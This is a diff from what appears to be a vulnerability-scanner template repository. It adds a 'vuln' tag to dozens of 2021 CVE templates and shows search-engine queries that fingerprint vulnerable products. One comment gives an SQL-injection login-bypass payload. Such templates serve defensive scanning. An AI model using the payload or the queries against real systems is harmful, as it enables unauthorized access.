holmes fofa-query: title="Holmes Orchestrator" - tags: cve,cve2021,wipro,holmes,orchestrator + tags: cve,cve2021,wipro,holmes,orchestrator,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-38154.yaml b/http/cves/2021/CVE-2021-38154.yaml index 06af88652f8..a6d94d6a6a1 100644 --- a/http/cves/2021/CVE-2021-38154.yaml +++ b/http/cves/2021/CVE-2021-38154.yaml @@ -23,7 +23,7 @@ info: max-request: 2 vendor: canon shodan-query: title:"imageRUNNER" - tags: cve,cve2021,canon,auth-bypass,vkev + tags: cve,cve2021,canon,auth-bypass,vkev,vuln flow: http(1) || http(2) diff --git a/http/cves/2021/CVE-2021-38156.yaml b/http/cves/2021/CVE-2021-38156.yaml index c2bd0d1abf5..619fcbe2438 100644 --- a/http/cves/2021/CVE-2021-38156.yaml +++ b/http/cves/2021/CVE-2021-38156.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.title:"nagios xi" fofa-query: app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2021,nagios,nagiosxi,xss,authenticated + tags: cve,cve2021,nagios,nagiosxi,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-3831.yaml b/http/cves/2021/CVE-2021-3831.yaml index 1b8a1defc33..2e2a999c0b8 100644 --- a/http/cves/2021/CVE-2021-3831.yaml +++ b/http/cves/2021/CVE-2021-3831.yaml @@ -24,7 +24,7 @@ info: shodan-query: http.html:"gnuboard5" product: gnuboard5 vendor: gnuboard - tags: cve,cve2021,gnuboard,xss,huntr + tags: cve,cve2021,gnuboard,xss,huntr,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index e2ed170d60c..62d5ea79ee7 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -28,7 +28,7 @@ info: vendor: redux product: gutenberg_template_library_\&_redux_framework framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,redux + tags: cve2021,cve,wordpress,wp-plugin,redux,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index aba124a801b..37e9e85707d 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve2021,cve,apache,airflow,rce,intrusive + tags: cve2021,cve,apache,airflow,rce,intrusive,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 62f6357f4e1..2e7dd4fa75a 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microsoft product: azure_automation_state_configuration - tags: cve2021,cve,rce,omi,microsoft,kev,vkev + tags: cve2021,cve,rce,omi,microsoft,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index eb63e3ebd53..7270fb2d278 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cyberoamworks product: netgenie_c0101b1-20141120-ng11vo_firmware - tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks,vkev + tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 3d3a7f4a81a..317e58acb5b 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -32,7 +32,7 @@ info: - http.title:"cliniccases",html:"/cliniccases/" fofa-query: title="cliniccases",html:"/cliniccases/" google-query: intitle:"cliniccases",html:"/cliniccases/" - tags: cve,cve2021,xss,cliniccases + tags: cve,cve2021,xss,cliniccases,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index 2a64fa3be41..42bdc056d43 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: exponentcms product: exponentcms - tags: cve2021,cve,exponentcms + tags: cve2021,cve,exponentcms,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml index a85f06e2dc2..9752c859228 100644 --- a/http/cves/2021/CVE-2021-39141.yaml +++ b/http/cves/2021/CVE-2021-39141.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce,xstream_project + tags: cve,cve2021,xstream,deserialization,rce,xstream_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index 9629c9ccaab..8ddc26c51a9 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project,vkev + tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index cebc553a2ef..1f685c8c756 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2021,cve,xstream,deserialization,rce,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,xstream_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index f981b9dca55..57550724bc2 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2021,cve,xstream,ssrf,oast,xstream_project + tags: cve2021,cve,xstream,ssrf,oast,xstream_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index b1c2b97cf2f..d7e44d65576 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -31,7 +31,7 @@ info: product: cachet shodan-query: http.favicon.hash:-1606065523 fofa-query: icon_hash=-1606065523 - tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq + tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 714638af8b7..ef753d6693c 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -33,7 +33,7 @@ info: - icon_hash="-1474875778" - title="glpi" google-query: intitle:"glpi" - tags: cve,cve2021,glpi,exposure,glpi-project,vkev + tags: cve,cve2021,glpi,exposure,glpi-project,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 41ed7d780fa..2bc48a07842 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -34,7 +34,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2021,cve,grafana,kev,vkev + tags: cve2021,cve,grafana,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index d096543ffe7..6a669aea411 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -25,7 +25,7 @@ info: vendor: trueranker product: true_ranker framework: wordpress - tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker,vkev + tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 2a1e60bbc12..723e76f38e2 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -28,7 +28,7 @@ info: vendor: digitalzoomstudio product: zoomsounds framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio,vkev + tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 88ff3a14a86..6d4939f9d8b 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -30,7 +30,7 @@ info: vendor: underconstruction_project product: underconstruction framework: wordpress - tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project + tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index aec5879ab19..8d015235067 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -28,7 +28,7 @@ info: vendor: cybernetikz product: easy_social_icons framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz + tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index fb478fd2070..61b6a551526 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -28,7 +28,7 @@ info: vendor: ait-pro product: bulletproof_security framework: wordpress - tags: cve2021,cve,exposure,packetstorm,wordpress,ait-pro + tags: cve2021,cve,exposure,packetstorm,wordpress,ait-pro,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-39341.yaml b/http/cves/2021/CVE-2021-39341.yaml index ecdc6b8061e..69c532e0eef 100644 --- a/http/cves/2021/CVE-2021-39341.yaml +++ b/http/cves/2021/CVE-2021-39341.yaml @@ -25,7 +25,7 @@ info: product: optinmonster framework: wordpress publicwww-query: "/wp-content/plugins/optinmonster" - tags: cve,cve221,wordpress,wp-plugin,optinmonster,rest-api,disclosure,unauth,exposure,vkev + tags: cve,cve221,wordpress,wp-plugin,optinmonster,rest-api,disclosure,unauth,exposure,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 501f4bbc949..63c61570020 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -28,7 +28,7 @@ info: vendor: foliovision product: fv_flowplayer_video_player framework: wordpress - tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision + tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39411.yaml b/http/cves/2021/CVE-2021-39411.yaml index 8cf23ed50a0..132c6132353 100644 --- a/http/cves/2021/CVE-2021-39411.yaml +++ b/http/cves/2021/CVE-2021-39411.yaml @@ -24,7 +24,7 @@ info: comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. product: hospital_management_system vendor: phptpoint - tags: cve,cve2021,hms,hospital,cms,xss,authenticated + tags: cve,cve2021,hms,hospital,cms,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index ef43881d0f4..55782a311c1 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: biqs product: biqsdrive - tags: cve2021,cve,lfi,biqsdrive,biqs + tags: cve2021,cve,lfi,biqsdrive,biqs,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 8eb1b122790..a9b8459a051 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -28,7 +28,7 @@ info: vendor: eyoucms product: eyoucms fofa-query: title="eyoucms" - tags: cve2021,cve,redirect,eyoucms,cms + tags: cve2021,cve,redirect,eyoucms,cms,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index 05a7c7975ba..364f21debd6 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.title:"Reolink" fofa-query: title="reolink" google-query: intitle:"reolink" - tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot + tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index de4543ca668..a76372602c1 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -34,7 +34,7 @@ info: - http.title:"reolink" fofa-query: title="reolink" google-query: intitle:"reolink" - tags: cve2021,cve,reolink,camera,exposure,iot + tags: cve2021,cve,reolink,camera,exposure,iot,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40272.yaml b/http/cves/2021/CVE-2021-40272.yaml index cd0d706389c..7892180c9e4 100644 --- a/http/cves/2021/CVE-2021-40272.yaml +++ b/http/cves/2021/CVE-2021-40272.yaml @@ -27,7 +27,7 @@ info: fofa-query: title="ITRS" product: monitor vendor: op5 - tags: cve2021,cve,irts,op5,xss + tags: cve2021,cve,irts,op5,xss,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 6707263d0ae..c55cd1977f9 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"cobbler web interface" fofa-query: title="cobbler web interface" google-query: intitle:"cobbler web interface" - tags: cve,cve2021,cobbler,rce,cobbler_project + tags: cve,cve2021,cobbler,rce,cobbler_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index 4b4b792f90a..5ef128ed0d1 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -28,7 +28,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve2021,cve,ssrf,apache,mod-proxy,kev,vkev + tags: cve2021,cve,ssrf,apache,mod-proxy,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index d20a59e029a..7af0db39d0b 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -35,7 +35,7 @@ info: google-query: - intitle:"adselfservice plus" - intitle:"manageengine" - tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp,vkev + tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 556cc615ebf..4c72afaa7e1 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -32,7 +32,7 @@ info: - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" - tags: cve2021,cve,xss,opensis,os4ed + tags: cve2021,cve,xss,opensis,os4ed,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index 5a81b0e19a9..ace185b5956 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -29,7 +29,7 @@ info: - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" - tags: cve,cve2021,lfi,os4ed,opensis,authenticated + tags: cve,cve2021,lfi,os4ed,opensis,authenticated,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40655.yaml b/http/cves/2021/CVE-2021-40655.yaml index 59631c3c7f5..57139c572c8 100644 --- a/http/cves/2021/CVE-2021-40655.yaml +++ b/http/cves/2021/CVE-2021-40655.yaml @@ -22,7 +22,7 @@ info: product: dir-605l_firmware fofa-query: body="l_tb>DIR-605" max-request: 1 - tags: cve,cve2021,dlink,kev,dir-605,info-leak,vkev + tags: cve,cve2021,dlink,kev,dir-605,info-leak,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index 3fa3a952756..d4711d7de6f 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -33,7 +33,7 @@ info: - IND780 - ind780 google-query: inurl:excalweb.dll - tags: cve2021,cve,ind780,lfi,mt + tags: cve2021,cve,ind780,lfi,mt,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 6b0ad67cf59..9eead60fdf9 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -36,7 +36,7 @@ info: - app="geoserver" - title="geoserver" google-query: intitle:"geoserver" - tags: cve2021,cve,ssrf,geoserver,osgeo,vkev + tags: cve2021,cve,ssrf,geoserver,osgeo,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 4fb615fad64..fde23a606c7 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: auerswald product: comfortel_3600_ip_firmware - tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald,vkev + tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 61bd4a28ccf..6a7997d9fcd 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -26,7 +26,7 @@ info: vendor: auerswald product: compact_5500r_firmware fofa-query: '"auerswald"' - tags: cve2021,cve,iot,unauth,voip,auerswald + tags: cve2021,cve,iot,unauth,voip,auerswald,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index e2c3aea2a0a..130be45a91a 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cloudron product: cloudron - tags: cve2021,cve,xss,cloudron,packetstorm + tags: cve2021,cve,xss,cloudron,packetstorm,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 1165a21a3c3..4c65841b3ce 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"aviatrix cloud controller" fofa-query: title="aviatrix cloud controller" google-query: intitle:"aviatrix cloud controller" - tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload,vkev + tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload,vkev,vuln variables: string: "CVE-2021-40870" diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 38f2ad5b0f3..42c2d5c66da 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -31,7 +31,7 @@ info: - http.html:"TestRail" - http.html:"testrail" fofa-query: body="testrail" - tags: cve2021,cve,exposure,gurock,testrail,vkev + tags: cve2021,cve,exposure,gurock,testrail,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index 50706c0e10c..127ea666477 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: galera product: galera_webtemplate - tags: cve2021,cve,lfi,galera + tags: cve2021,cve,lfi,galera,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index e18fddc09e9..2515e3401fd 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -32,7 +32,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: cve2021,cve,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 622c8e665b8..14fa1224fa6 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -32,7 +32,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: cve2021,cve,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 01e0f3dc042..59b6c26f3c6 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -32,7 +32,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: cve2021,cve,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index b08f8d0c23a..9003aef822f 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -32,7 +32,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: cve2021,cve,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index ca08f83bd16..827a5873f0b 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -32,7 +32,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: cve,cve2021,xss,spotweb,spotweb_project + tags: cve,cve2021,xss,spotweb,spotweb_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index a3454062a99..a8a91f913dc 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -32,7 +32,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: cve2021,cve,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index cf423924630..e74d18611ad 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mkdocs product: mkdocs - tags: cve2021,cve,mkdocs,lfi + tags: cve2021,cve,mkdocs,lfi,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index d1f33a957c9..4f5de164f9e 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -34,7 +34,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2021,cve,grafana,xss,vkev + tags: cve2021,cve,grafana,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 17e499e6351..84c11d2cf12 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -29,7 +29,7 @@ info: product: redash shodan-query: http.favicon.hash:698624197 fofa-query: icon_hash=698624197 - tags: cve2021,cve,hackerone,redash,auth-bypass + tags: cve2021,cve,hackerone,redash,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index 245be2ae1d1..7a240b0fdc0 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: min product: minio_console - tags: cve2021,cve,minio,min,vkev + tags: cve2021,cve,minio,min,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index d92254ca8f7..362f677ffaa 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -36,7 +36,7 @@ info: - title="metabase" - app="metabase" google-query: "intitle:\"metabase\"" - tags: cve2021,cve,metabase,lfi,kev,vkev + tags: cve2021,cve,metabase,lfi,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 8877e890cb2..2ff1971b85e 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"pfsense - login" fofa-query: title="pfsense - login" google-query: intitle:"pfsense - login" - tags: cve2021,cve,pfsense,rce,authenticated + tags: cve2021,cve,pfsense,rce,authenticated,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 08117a6f825..47c74b69f23 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ecoa product: ecs_router_controller-ecs_firmware - tags: cve2021,cve,ecoa,lfi,traversal + tags: cve2021,cve,ecoa,lfi,traversal,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 9e852ec7292..9108278545b 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: ecoa product: ecs_router_controller-ecs_firmware - tags: cve2021,cve,ecoa,lfi,disclosure,vkev + tags: cve2021,cve,ecoa,lfi,disclosure,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 89274f413f0..7263ea263ca 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -35,7 +35,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve,cve2021,xss,microsoft,exchange,vkev + tags: cve,cve2021,xss,microsoft,exchange,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index 7cd28ebc964..ea11377db7d 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: payara product: micro_community - tags: cve2021,cve,payara,lfi,packetstorm + tags: cve2021,cve,payara,lfi,packetstorm,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 3cefda7f6e5..7f316d1e8b9 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -36,7 +36,7 @@ info: fofa-query: - body="flatpress" - icon_hash=-1189292869 - tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive + tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 4ded4ae6e35..886c0768b59 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -29,7 +29,7 @@ info: fofa-query: - product="ECShop" - product="ecshop" - tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex + tags: 